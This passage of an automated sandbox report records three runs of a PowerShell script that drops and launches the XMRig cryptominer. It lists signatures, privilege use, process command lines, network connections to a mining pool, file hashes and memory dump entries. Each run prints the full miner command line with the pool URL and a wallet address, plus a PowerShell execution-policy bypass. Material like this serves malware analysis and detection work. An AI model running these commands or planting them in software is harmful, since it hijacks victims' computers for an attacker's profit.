memory/4268-107-0x00007FF7C24C0000-0x00007FF7C30F3000-memory.dmp

memory/4268-108-0x00007FF7C24C0000-0x00007FF7C30F3000-memory.dmp

memory/4268-109-0x00007FF7C24C0000-0x00007FF7C30F3000-memory.dmp

memory/4268-110-0x00007FF7C24C0000-0x00007FF7C30F3000-memory.dmp

memory/4268-111-0x00007FF7C24C0000-0x00007FF7C30F3000-memory.dmp

memory/4268-112-0x00007FF7C24C0000-0x00007FF7C30F3000-memory.dmp

memory/4268-113-0x00007FF7C24C0000-0x00007FF7C30F3000-memory.dmp

memory/4268-114-0x00007FF7C24C0000-0x00007FF7C30F3000-memory.dmp

memory/4268-115-0x00007FF7C24C0000-0x00007FF7C30F3000-memory.dmp

memory/4268-116-0x00007FF7C24C0000-0x00007FF7C30F3000-memory.dmp

memory/4268-117-0x00007FF7C24C0000-0x00007FF7C30F3000-memory.dmp

memory/4268-118-0x00007FF7C24C0000-0x00007FF7C30F3000-memory.dmp

Analysis: behavioral3

Detonation Overview

Submitted

2024-05-22 20:05

Reported

2024-05-22 20:36

Platform

win10v2004-20240508-en

Max time kernel

1793s

Max time network

1781s

Command Line

powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (2).ps1"

Signatures

XMRig Miner payload

miner
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

xmrig

miner xmrig

Blocklisted process makes network request

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Command and Scripting Interpreter: PowerShell

execution
Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Processes

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (2).ps1"

C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe

"C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe" -a rx -o stratum+ssl://rx.unmineable.com:443 -u XMR:45aHvZ4X3ZvdhLiEiP1cjsXmSkMNoM2QFYNmXCsoTRY9h2EwjtoYcfrVpEojtmBeg5cRsY9J82Lqp6hUanQ1Dsu4UNfKxdF.unmineable_worker_vilqtiac -p x

Network

Country Destination Domain Proto
US 8.8.8.8:53 github.com udp
GB 20.26.156.215:443 github.com tcp
US 8.8.8.8:53 215.156.26.20.in-addr.arpa udp
US 8.8.8.8:53 g.bing.com udp
US 204.79.197.237:443 g.bing.com tcp
US 8.8.8.8:53 objects.githubusercontent.com udp
US 185.199.110.133:443 objects.githubusercontent.com tcp
US 8.8.8.8:53 237.197.79.204.in-addr.arpa udp
NL 23.62.61.146:443 www.bing.com tcp
US 8.8.8.8:53 146.61.62.23.in-addr.arpa udp
US 8.8.8.8:53 133.110.199.185.in-addr.arpa udp
US 8.8.8.8:53 140.32.126.40.in-addr.arpa udp
US 8.8.8.8:53 149.220.183.52.in-addr.arpa udp
US 8.8.8.8:53 0.205.248.87.in-addr.arpa udp
NL 23.62.61.146:443 www.bing.com tcp
US 8.8.8.8:53 28.118.140.52.in-addr.arpa udp
US 8.8.8.8:53 86.23.85.13.in-addr.arpa udp
US 8.8.8.8:53 rx.unmineable.com udp
GB 161.35.34.195:443 rx.unmineable.com tcp
US 8.8.8.8:53 195.34.35.161.in-addr.arpa udp
US 8.8.8.8:53 198.187.3.20.in-addr.arpa udp
US 8.8.8.8:53 37.56.20.217.in-addr.arpa udp
US 8.8.8.8:53 129.83.221.88.in-addr.arpa udp
US 8.8.8.8:53 172.210.232.199.in-addr.arpa udp
US 8.8.8.8:53 29.243.111.52.in-addr.arpa udp
US 8.8.8.8:53 30.73.42.20.in-addr.arpa udp

Files

memory/4984-0-0x00007FFF5E983000-0x00007FFF5E985000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_leim02cx.o25.ps1

MD5 d17fe0a3f47be24a6453e9ef58c94641
SHA1 6ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA256 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA512 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

memory/4984-8-0x00000199485C0000-0x00000199485E2000-memory.dmp

memory/4984-11-0x00007FFF5E980000-0x00007FFF5F441000-memory.dmp

memory/4984-12-0x00007FFF5E980000-0x00007FFF5F441000-memory.dmp

memory/4984-13-0x00007FFF5E983000-0x00007FFF5E985000-memory.dmp

memory/4984-14-0x00007FFF5E980000-0x00007FFF5F441000-memory.dmp

memory/4984-16-0x00007FFF5E980000-0x00007FFF5F441000-memory.dmp

memory/4984-17-0x0000019948970000-0x0000019948982000-memory.dmp

memory/4984-18-0x0000019948590000-0x000001994859A000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe

MD5 205ad9eb6acd6f58752899669b69fe74
SHA1 bedb78ac5034259b86c2cbc915de2e861e8d7604
SHA256 2025f4fe930440da147eecd24a368d3a2f3c1883c499186eb429e9d662c90fda
SHA512 28309f453ae87e8db8c1667d8d8eee5f5f7035372c027afbec48aa3c798c53ade7cfcec0c9575cad2d108e033395ebde4fda6fcfff72c99944119f8fa91d91c3

memory/4300-49-0x000002014A7B0000-0x000002014A7D0000-memory.dmp

memory/4300-50-0x000002014A7F0000-0x000002014A810000-memory.dmp

memory/4300-51-0x00007FF630ED0000-0x00007FF631B03000-memory.dmp

memory/4300-52-0x000002014A810000-0x000002014A830000-memory.dmp

memory/4300-53-0x000002014A830000-0x000002014A850000-memory.dmp

memory/4300-54-0x00007FF630ED0000-0x00007FF631B03000-memory.dmp

memory/4984-55-0x00007FFF5E980000-0x00007FFF5F441000-memory.dmp

memory/4300-56-0x00007FF630ED0000-0x00007FF631B03000-memory.dmp

memory/4300-57-0x00007FF630ED0000-0x00007FF631B03000-memory.dmp

memory/4300-58-0x000002014A810000-0x000002014A830000-memory.dmp

memory/4300-59-0x000002014A830000-0x000002014A850000-memory.dmp

memory/4300-60-0x00007FF630ED0000-0x00007FF631B03000-memory.dmp

memory/4300-61-0x00007FF630ED0000-0x00007FF631B03000-memory.dmp

memory/4300-62-0x00007FF630ED0000-0x00007FF631B03000-memory.dmp

memory/4300-63-0x00007FF630ED0000-0x00007FF631B03000-memory.dmp

memory/4300-64-0x00007FF630ED0000-0x00007FF631B03000-memory.dmp

memory/4300-65-0x00007FF630ED0000-0x00007FF631B03000-memory.dmp

memory/4300-66-0x00007FF630ED0000-0x00007FF631B03000-memory.dmp

memory/4300-67-0x00007FF630ED0000-0x00007FF631B03000-memory.dmp

memory/4300-68-0x00007FF630ED0000-0x00007FF631B03000-memory.dmp

memory/4300-69-0x00007FF630ED0000-0x00007FF631B03000-memory.dmp

memory/4300-70-0x00007FF630ED0000-0x00007FF631B03000-memory.dmp

memory/4300-71-0x00007FF630ED0000-0x00007FF631B03000-memory.dmp

memory/4300-72-0x00007FF630ED0000-0x00007FF631B03000-memory.dmp

memory/4300-73-0x00007FF630ED0000-0x00007FF631B03000-memory.dmp

memory/4300-74-0x00007FF630ED0000-0x00007FF631B03000-memory.dmp

memory/4300-75-0x00007FF630ED0000-0x00007FF631B03000-memory.dmp

memory/4300-76-0x00007FF630ED0000-0x00007FF631B03000-memory.dmp

memory/4300-77-0x00007FF630ED0000-0x00007FF631B03000-memory.dmp

memory/4300-78-0x00007FF630ED0000-0x00007FF631B03000-memory.dmp

memory/4300-79-0x00007FF630ED0000-0x00007FF631B03000-memory.dmp

memory/4300-80-0x00007FF630ED0000-0x00007FF631B03000-memory.dmp

memory/4300-81-0x00007FF630ED0000-0x00007FF631B03000-memory.dmp

memory/4300-82-0x00007FF630ED0000-0x00007FF631B03000-memory.dmp

memory/4300-83-0x00007FF630ED0000-0x00007FF631B03000-memory.dmp

memory/4300-84-0x00007FF630ED0000-0x00007FF631B03000-memory.dmp

memory/4300-85-0x00007FF630ED0000-0x00007FF631B03000-memory.dmp

memory/4300-86-0x00007FF630ED0000-0x00007FF631B03000-memory.dmp

memory/4300-87-0x00007FF630ED0000-0x00007FF631B03000-memory.dmp

memory/4300-88-0x00007FF630ED0000-0x00007FF631B03000-memory.dmp

memory/4300-89-0x00007FF630ED0000-0x00007FF631B03000-memory.dmp

memory/4300-90-0x00007FF630ED0000-0x00007FF631B03000-memory.dmp

memory/4300-91-0x00007FF630ED0000-0x00007FF631B03000-memory.dmp

memory/4300-92-0x00007FF630ED0000-0x00007FF631B03000-memory.dmp

memory/4300-93-0x00007FF630ED0000-0x00007FF631B03000-memory.dmp

memory/4300-94-0x00007FF630ED0000-0x00007FF631B03000-memory.dmp

memory/4300-95-0x00007FF630ED0000-0x00007FF631B03000-memory.dmp

memory/4300-96-0x00007FF630ED0000-0x00007FF631B03000-memory.dmp

memory/4300-97-0x00007FF630ED0000-0x00007FF631B03000-memory.dmp

memory/4300-98-0x00007FF630ED0000-0x00007FF631B03000-memory.dmp

memory/4300-99-0x00007FF630ED0000-0x00007FF631B03000-memory.dmp

memory/4300-100-0x00007FF630ED0000-0x00007FF631B03000-memory.dmp

memory/4300-101-0x00007FF630ED0000-0x00007FF631B03000-memory.dmp

memory/4300-102-0x00007FF630ED0000-0x00007FF631B03000-memory.dmp

memory/4300-103-0x00007FF630ED0000-0x00007FF631B03000-memory.dmp

memory/4300-104-0x00007FF630ED0000-0x00007FF631B03000-memory.dmp

memory/4300-105-0x00007FF630ED0000-0x00007FF631B03000-memory.dmp

memory/4300-106-0x00007FF630ED0000-0x00007FF631B03000-memory.dmp

memory/4300-107-0x00007FF630ED0000-0x00007FF631B03000-memory.dmp

memory/4300-108-0x00007FF630ED0000-0x00007FF631B03000-memory.dmp

memory/4300-109-0x00007FF630ED0000-0x00007FF631B03000-memory.dmp

memory/4300-110-0x00007FF630ED0000-0x00007FF631B03000-memory.dmp

memory/4300-111-0x00007FF630ED0000-0x00007FF631B03000-memory.dmp

memory/4300-112-0x00007FF630ED0000-0x00007FF631B03000-memory.dmp

memory/4300-113-0x00007FF630ED0000-0x00007FF631B03000-memory.dmp

memory/4300-114-0x00007FF630ED0000-0x00007FF631B03000-memory.dmp

memory/4300-115-0x00007FF630ED0000-0x00007FF631B03000-memory.dmp

memory/4300-116-0x00007FF630ED0000-0x00007FF631B03000-memory.dmp

memory/4300-117-0x00007FF630ED0000-0x00007FF631B03000-memory.dmp

memory/4300-118-0x00007FF630ED0000-0x00007FF631B03000-memory.dmp

Analysis: behavioral12

Detonation Overview

Submitted

2024-05-22 20:05

Reported

2024-05-22 20:36

Platform

win11-20240419-en

Max time kernel

1797s

Max time network

1776s

Command Line

powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (4).ps1"

Signatures

XMRig Miner payload

miner
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

xmrig

miner xmrig

Blocklisted process makes network request

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Command and Scripting Interpreter: PowerShell

execution
Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Processes

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (4).ps1"

C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe

"C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe" -a rx -o stratum+ssl://rx.unmineable.com:443 -u XMR:45aHvZ4X3ZvdhLiEiP1cjsXmSkMNoM2QFYNmXCsoTRY9h2EwjtoYcfrVpEojtmBeg5cRsY9J82Lqp6hUanQ1Dsu4UNfKxdF.unmineable_worker_vilqtiac -p x

Network

Country Destination Domain Proto
US 8.8.8.8:53 github.com udp
GB 20.26.156.215:443 github.com tcp
US 8.8.8.8:53 215.156.26.20.in-addr.arpa udp
US 185.199.110.133:443 objects.githubusercontent.com tcp
US 8.8.8.8:53 133.110.199.185.in-addr.arpa udp
US 8.8.8.8:53 rx.unmineable.com udp
GB 161.35.34.195:443 rx.unmineable.com tcp
US 8.8.8.8:53 195.34.35.161.in-addr.arpa udp
US 8.8.8.8:53 30.73.42.20.in-addr.arpa udp

Files

memory/2056-0-0x00007FFE572F3000-0x00007FFE572F5000-memory.dmp

memory/2056-1-0x0000019B3A740000-0x0000019B3A762000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_srvxff0y.exd.ps1

MD5 d17fe0a3f47be24a6453e9ef58c94641
SHA1 6ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA256 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA512 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

memory/2056-10-0x00007FFE572F0000-0x00007FFE57DB2000-memory.dmp

memory/2056-11-0x00007FFE572F0000-0x00007FFE57DB2000-memory.dmp

memory/2056-12-0x00007FFE572F0000-0x00007FFE57DB2000-memory.dmp

memory/2056-15-0x0000019B3A7D0000-0x0000019B3A7DA000-memory.dmp

memory/2056-14-0x0000019B3A7E0000-0x0000019B3A7F2000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe

MD5 205ad9eb6acd6f58752899669b69fe74
SHA1 bedb78ac5034259b86c2cbc915de2e861e8d7604
SHA256 2025f4fe930440da147eecd24a368d3a2f3c1883c499186eb429e9d662c90fda
SHA512 28309f453ae87e8db8c1667d8d8eee5f5f7035372c027afbec48aa3c798c53ade7cfcec0c9575cad2d108e033395ebde4fda6fcfff72c99944119f8fa91d91c3

memory/4536-46-0x0000017D530D0000-0x0000017D530F0000-memory.dmp

memory/2056-47-0x00007FFE572F3000-0x00007FFE572F5000-memory.dmp

memory/2056-48-0x00007FFE572F0000-0x00007FFE57DB2000-memory.dmp

memory/4536-49-0x0000017D54AD0000-0x0000017D54AF0000-memory.dmp

memory/4536-50-0x00007FF695AF0000-0x00007FF696723000-memory.dmp

memory/4536-51-0x00007FF695AF0000-0x00007FF696723000-memory.dmp

memory/4536-53-0x0000017D54B10000-0x0000017D54B30000-memory.dmp

memory/4536-52-0x0000017D54AF0000-0x0000017D54B10000-memory.dmp

memory/4536-54-0x00007FF695AF0000-0x00007FF696723000-memory.dmp

memory/4536-55-0x00007FF695AF0000-0x00007FF696723000-memory.dmp

memory/4536-57-0x0000017D54B10000-0x0000017D54B30000-memory.dmp

memory/4536-56-0x0000017D54AF0000-0x0000017D54B10000-memory.dmp

memory/4536-58-0x00007FF695AF0000-0x00007FF696723000-memory.dmp

memory/4536-59-0x00007FF695AF0000-0x00007FF696723000-memory.dmp

memory/4536-60-0x00007FF695AF0000-0x00007FF696723000-memory.dmp

memory/4536-61-0x00007FF695AF0000-0x00007FF696723000-memory.dmp

memory/4536-62-0x00007FF695AF0000-0x00007FF696723000-memory.dmp

memory/4536-63-0x00007FF695AF0000-0x00007FF696723000-memory.dmp

memory/4536-64-0x00007FF695AF0000-0x00007FF696723000-memory.dmp

memory/4536-65-0x00007FF695AF0000-0x00007FF696723000-memory.dmp

memory/4536-66-0x00007FF695AF0000-0x00007FF696723000-memory.dmp

memory/4536-67-0x00007FF695AF0000-0x00007FF696723000-memory.dmp

memory/4536-68-0x00007FF695AF0000-0x00007FF696723000-memory.dmp

memory/4536-69-0x00007FF695AF0000-0x00007FF696723000-memory.dmp

memory/4536-70-0x00007FF695AF0000-0x00007FF696723000-memory.dmp

memory/4536-71-0x00007FF695AF0000-0x00007FF696723000-memory.dmp

memory/4536-72-0x00007FF695AF0000-0x00007FF696723000-memory.dmp

memory/4536-73-0x00007FF695AF0000-0x00007FF696723000-memory.dmp

memory/4536-74-0x00007FF695AF0000-0x00007FF696723000-memory.dmp

memory/4536-75-0x00007FF695AF0000-0x00007FF696723000-memory.dmp

memory/4536-76-0x00007FF695AF0000-0x00007FF696723000-memory.dmp

memory/4536-77-0x00007FF695AF0000-0x00007FF696723000-memory.dmp

memory/4536-78-0x00007FF695AF0000-0x00007FF696723000-memory.dmp

memory/4536-79-0x00007FF695AF0000-0x00007FF696723000-memory.dmp

memory/4536-80-0x00007FF695AF0000-0x00007FF696723000-memory.dmp

memory/4536-81-0x00007FF695AF0000-0x00007FF696723000-memory.dmp

memory/4536-82-0x00007FF695AF0000-0x00007FF696723000-memory.dmp

memory/4536-83-0x00007FF695AF0000-0x00007FF696723000-memory.dmp

memory/4536-84-0x00007FF695AF0000-0x00007FF696723000-memory.dmp

memory/4536-85-0x00007FF695AF0000-0x00007FF696723000-memory.dmp

memory/4536-86-0x00007FF695AF0000-0x00007FF696723000-memory.dmp

memory/4536-87-0x00007FF695AF0000-0x00007FF696723000-memory.dmp

memory/4536-88-0x00007FF695AF0000-0x00007FF696723000-memory.dmp

memory/4536-89-0x00007FF695AF0000-0x00007FF696723000-memory.dmp

memory/4536-90-0x00007FF695AF0000-0x00007FF696723000-memory.dmp

memory/4536-91-0x00007FF695AF0000-0x00007FF696723000-memory.dmp

memory/4536-92-0x00007FF695AF0000-0x00007FF696723000-memory.dmp

memory/4536-93-0x00007FF695AF0000-0x00007FF696723000-memory.dmp

memory/4536-94-0x00007FF695AF0000-0x00007FF696723000-memory.dmp

memory/4536-95-0x00007FF695AF0000-0x00007FF696723000-memory.dmp

memory/4536-96-0x00007FF695AF0000-0x00007FF696723000-memory.dmp

memory/4536-97-0x00007FF695AF0000-0x00007FF696723000-memory.dmp

memory/4536-98-0x00007FF695AF0000-0x00007FF696723000-memory.dmp

memory/4536-99-0x00007FF695AF0000-0x00007FF696723000-memory.dmp

memory/4536-100-0x00007FF695AF0000-0x00007FF696723000-memory.dmp

memory/4536-101-0x00007FF695AF0000-0x00007FF696723000-memory.dmp

memory/4536-102-0x00007FF695AF0000-0x00007FF696723000-memory.dmp

memory/4536-103-0x00007FF695AF0000-0x00007FF696723000-memory.dmp

memory/4536-104-0x00007FF695AF0000-0x00007FF696723000-memory.dmp

memory/4536-105-0x00007FF695AF0000-0x00007FF696723000-memory.dmp

memory/4536-106-0x00007FF695AF0000-0x00007FF696723000-memory.dmp

memory/4536-107-0x00007FF695AF0000-0x00007FF696723000-memory.dmp

memory/4536-108-0x00007FF695AF0000-0x00007FF696723000-memory.dmp

memory/4536-109-0x00007FF695AF0000-0x00007FF696723000-memory.dmp

memory/4536-110-0x00007FF695AF0000-0x00007FF696723000-memory.dmp

memory/4536-111-0x00007FF695AF0000-0x00007FF696723000-memory.dmp

memory/4536-112-0x00007FF695AF0000-0x00007FF696723000-memory.dmp

memory/4536-113-0x00007FF695AF0000-0x00007FF696723000-memory.dmp

memory/4536-114-0x00007FF695AF0000-0x00007FF696723000-memory.dmp

memory/4536-115-0x00007FF695AF0000-0x00007FF696723000-memory.dmp

memory/4536-116-0x00007FF695AF0000-0x00007FF696723000-memory.dmp

Analysis: behavioral19

Detonation Overview

Submitted

2024-05-22 20:05

Reported

2024-05-22 20:43

Platform

win10v2004-20240426-en

Max time kernel

1795s

Max time network

1791s

Command Line

powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (6).ps1"

Signatures

XMRig Miner payload

miner
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

xmrig

miner xmrig

Blocklisted process makes network request

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Command and Scripting Interpreter: PowerShell

execution
Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Processes

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (6).ps1"

C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe

"C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe" -a rx -o stratum+ssl://rx.unmineable.com:443 -u XMR:45aHvZ4X3ZvdhLiEiP1cjsXmSkMNoM2QFYNmXCsoTRY9h2EwjtoYcfrVpEojtmBeg5cRsY9J82Lqp6hUanQ1Dsu4UNfKxdF.unmineable_worker_vilqtiac -p x

Network

Country Destination Domain Proto
US 8.8.8.8:53 github.com udp
GB 20.26.156.215:443 github.com tcp
US 8.8.8.8:53 8.8.8.8.in-addr.arpa udp
US 8.8.8.8:53 g.bing.com udp
US 204.79.197.237:443 g.bing.com tcp
US 8.8.8.8:53 237.197.79.204.in-addr.arpa udp
US 8.8.8.8:53 objects.githubusercontent.com udp
US 185.199.110.133:443 objects.githubusercontent.com tcp
US 8.8.8.8:53 43.56.20.217.in-addr.arpa udp
US 8.8.8.8:53 215.156.26.20.in-addr.arpa udp
US 8.8.8.8:53 133.110.199.185.in-addr.arpa udp
US 8.8.8.8:53 95.221.229.192.in-addr.arpa udp
NL 23.62.61.155:443 www.bing.com tcp
US 8.8.8.8:53 209.205.72.20.in-addr.arpa udp
US 8.8.8.8:53 155.61.62.23.in-addr.arpa udp
US 8.8.8.8:53 138.32.126.40.in-addr.arpa udp
NL 23.62.61.155:443 www.bing.com tcp
US 8.8.8.8:53 13.86.106.20.in-addr.arpa udp
US 8.8.8.8:53 15.164.165.52.in-addr.arpa udp
US 8.8.8.8:53 103.169.127.40.in-addr.arpa udp
US 8.8.8.8:53 rx.unmineable.com udp
GB 161.35.34.195:443 rx.unmineable.com tcp
US 8.8.8.8:53 195.34.35.161.in-addr.arpa udp
US 8.8.8.8:53 219.183.117.104.in-addr.arpa udp
US 8.8.8.8:53 30.243.111.52.in-addr.arpa udp
